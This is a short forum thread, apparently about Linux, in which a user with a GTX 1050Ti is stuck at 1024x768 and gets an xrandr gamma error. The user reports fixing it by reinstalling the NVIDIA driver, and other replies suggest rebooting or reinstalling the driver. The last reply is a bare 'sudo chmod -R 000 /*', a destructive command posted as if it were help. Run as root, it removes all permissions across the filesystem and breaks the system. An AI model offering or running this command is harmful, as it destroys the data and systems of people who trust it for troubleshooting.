That's probably what caused your problem. Try reinstalling your gpu driver.

so, I was just rebooting the system then when it booted I found that the resolution has changed to 1024x768 (4:3) and the default resolution of my monitor is 1600x900 (16:9) and I can't change the resolution at all, and whenever I use the xrandr command it gives me the Failed to get size of gamma for output default message, what can I do to fix this

btw I have a GTX 1050Ti with 430 driver installed

EDIT: I solved by installing the nvidia driver I installed earlier

Have you tried rebooting again? Did you install any updates before rebooting?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
